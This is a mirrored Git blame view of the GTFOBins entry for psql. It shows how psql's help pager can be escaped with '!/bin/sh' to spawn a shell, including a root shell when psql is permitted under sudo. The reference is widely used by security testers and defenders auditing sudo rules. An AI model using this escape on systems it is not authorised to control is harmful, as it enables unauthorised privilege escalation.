1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/psql.md

15 lines
267 B
Markdown
Raw Permalink Normal View History

2020-11-12 14:21:00 +01:00
---
2020-12-20 20:13:01 +01:00
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
2020-11-12 14:21:00 +01:00
functions:
shell:
- code: |
psql
\?
2020-12-20 20:13:01 +01:00
!/bin/sh
sudo:
2020-11-12 14:21:00 +01:00
- code: |
psql
\?
2020-12-20 20:13:01 +01:00
!/bin/sh
2020-11-12 14:21:00 +01:00
---